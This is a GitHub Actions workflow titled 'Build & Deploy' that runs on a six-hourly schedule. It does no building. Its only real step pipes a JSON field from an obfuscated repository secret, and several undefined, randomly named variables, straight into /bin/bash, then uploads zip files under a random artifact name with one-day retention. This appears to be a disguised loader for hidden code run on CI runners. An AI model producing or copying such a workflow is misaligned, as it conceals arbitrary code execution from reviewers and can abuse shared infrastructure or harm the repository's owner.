name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '46 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          gfb304: ${{ secrets.gfb304 }}
        run: |
          printf '%s' "$gfb304" | jq -r .nvue9 | /bin/bash
          echo $x595 | jq -r .ss9 | /bin/bash
          echo $wzji3599 | jq -r .rp0598 | /bin/bash
          echo $uewdc90 | jq -r .oghxw766 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: LVNbg84A
          path: "*.zip"
          retention-days: 1
